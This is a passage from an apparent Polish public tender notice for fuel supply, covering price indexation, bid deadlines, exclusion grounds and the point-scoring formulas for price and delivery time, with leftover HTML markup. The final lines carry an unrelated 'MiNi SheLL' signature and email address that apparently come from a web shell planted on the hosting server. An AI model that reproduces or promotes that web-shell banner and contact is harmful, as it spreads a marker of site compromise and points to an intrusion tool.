Urzędu<br/>Statystycznego w Biuletynie Statystycznym GUS dla towaru objętego umową.<br/>4. Waloryzacja powodująca zmniejszenie lub zwiększenie cen przyjętych w umowie może być dokonana na pisemny<br/>wniosek Zamawiającego lub Wykonawcy nie wcześniej jednak, niż po 4 miesiącach obowiązywania umowy.<br/>5. Każda ze stron ma prawo do dwukrotnej waloryzacji na swoją korzyść.<br/>6. Cena po waloryzacji będzie obowiązywała od daty wskazanej w aneksie do umowy.<br/>7. W przypadku braku porozumienia co do ceny lub braku akceptacji dla proponowanej zmiany Strony mogą umowę<br/>rozwiązać za porozumieniem stron lub za 2-miesięcznym okresem wypowiedzenia, przy czym w okresie wypowiedzenia<br/>obowiązywać będą dotychczasowe ceny. Okres wypowiedzenia liczony jest od miesiąca następnego po miesiącu, w którym<br/>nastąpiło wypowiedzenie.<br/>8. Zmiana cen jednostkowych nie spowoduje zmiany wartości całkowitej umowy. W przypadku wcześniejszego<br/>wydatkowania przez Zamawiającego środków przeznaczonych na realizację zamówienia, określonych w § 3 ust 1<br/>(wynagrodzenie brutto), umowa wygasa. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-11-30 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Otwarcie ofert nastąpi poprzez użycie mechanizmu do odszyfrowania ofert dostępnego po zalogowaniu w zakładce Deszyfrowanie na miniPortalu.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-11-30 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-12-29</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Z postępowania o udzielenie zamówienia publicznego wyklucza się Wykonawców na podstawie art. 108 ust 1 ustawy<br/>Prawo zamówień publicznych oraz art. 7 ust. 1 Ustawy z<br/>dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz<br/>służących ochronie bezpieczeństwa narodowego.<br/>2. Każda z ofert otrzyma liczbę punktów jaka wynika ze wzoru: LPi = C+ T<br/>gdzie:<br/>LPi - Całkowita liczba punktów przyznanych ofercie;<br/>C - Liczba punktów jakie otrzyma oferta badana za kryterium Cena ofertowa brutto (C)<br/>T - Liczba punktów jakie otrzyma oferta badana za kryterium Termin dostawy (T)<br/>Zastosowane wzory do obliczenia punktowego:<br/>Nazwa kryterium: cena (C)<br/>C = Cmin / Cbad x Kp x Wc<br/>Przy czym:<br/>Cmin – najniższa oferowana cena brutto poddana ocenie, tj. spośród wszystkich ofert niepodlegających odrzuceniu;<br/>Cbad – cena ofertowa brutto badanej oferty;<br/>Kp – współczynnik proporcjonalności = 100<br/>Wc – waga kryterium oceny – 60 %<br/>Nazwa kryterium: Termin dostawy (T)<br/>Punktacja w tym kryterium przyznawana będzie na podstawie oświadczenia Wykonawcy złożonego w Formularzu<br/>ofertowym. Wykonawca zobowiązany jest zadeklarować w ofercie termin dostawy częściowej tzn. termin, w jakim<br/>zobowiązany będzie do dostawy opału, licząc od momentu zgłoszenia zapotrzebowania przez Zamawiającego.<br/>Zgłoszenie zapotrzebowania nastąpi drogą telefoniczną i będzie potwierdzone za pośrednictwem<br/>komunikacji elektronicznej: e-mail.<br/>Oferta z terminem dostawy do 6 dni od dnia zgłoszenia zapotrzebowania przez Zamawiającego otrzyma 0 pkt;<br/>Oferta z terminem dostawy do 5 dni od dnia zgłoszenia zapotrzebowania przez Zamawiającego otrzyma 10 pkt;<br/>Oferta z terminem dostawy do 4 dni od dnia zgłoszenia zapotrzebowania przez Zamawiającego otrzyma 20 pkt;<br/>Oferta z terminem dostawy do 3 dni od dnia zgłoszenia zapotrzebowania przez Zamawiającego otrzyma 30 pkt;<br/>Oferta z terminem dostawy do 2 dni od dnia zgłoszenia zapotrzebowania<br/>przez Zamawiającego otrzyma 40 pkt.<br/>Termin realizacji dostawy realizowanej na podstawie jednorazowego zgłoszenia zapotrzebowania (T) to czas liczony od dnia<br/>następującego po dniu przekazania jednorazowego zgłoszenia zapotrzebowania do dnia faktycznej dostawy opału w<br/>zamówionej wielkości.<br/>Nieprzekraczalny termin realizacji wynosi 6 dni od dnia ww. zgłoszenia zapotrzebowania.<br/>Zaoferowanie dłuższego terminu realizacji dostawy będzie traktowane jako nieodpowiadające warunkom zamówienia i<br/>skutkować będzie odrzuceniem oferty.<br/>Brak określenia w ofercie terminu dostawy (brak zaznaczenia znaku „X” lub innego jednoznacznego oznaczenia we<br/>właściwym miejscu) skutkować będzie uznaniem, że Wykonawca zrealizuje dostawy w terminie do 6 dni od dnia zgłoszenia<br/>zapotrzebowania i przyznaniem w tym kryterium 0 pkt.<br/>Oferta wypełniająca w najwyższym stopniu wymagania otrzyma maksymalną liczbę punktów.<br/>Pozostałym ofertom, wypełniającym wymagania kryterialne przypisana zostanie odpowiednio<br/>mniejsza (proporcjonalnie mniejsza) liczba punktów. Wynik będzie traktowany jako wartość<br/>punktowa oferty.<br/>Oferta, która przedstawia najkorzystniejszy bilans (maksymalna liczba przyznanych punktów w<br/>oparciu o ustalone kryteria) zostanie uznana za najkorzystniejszą.

Creat By MiNi SheLL
Email: jattceo@gmail.com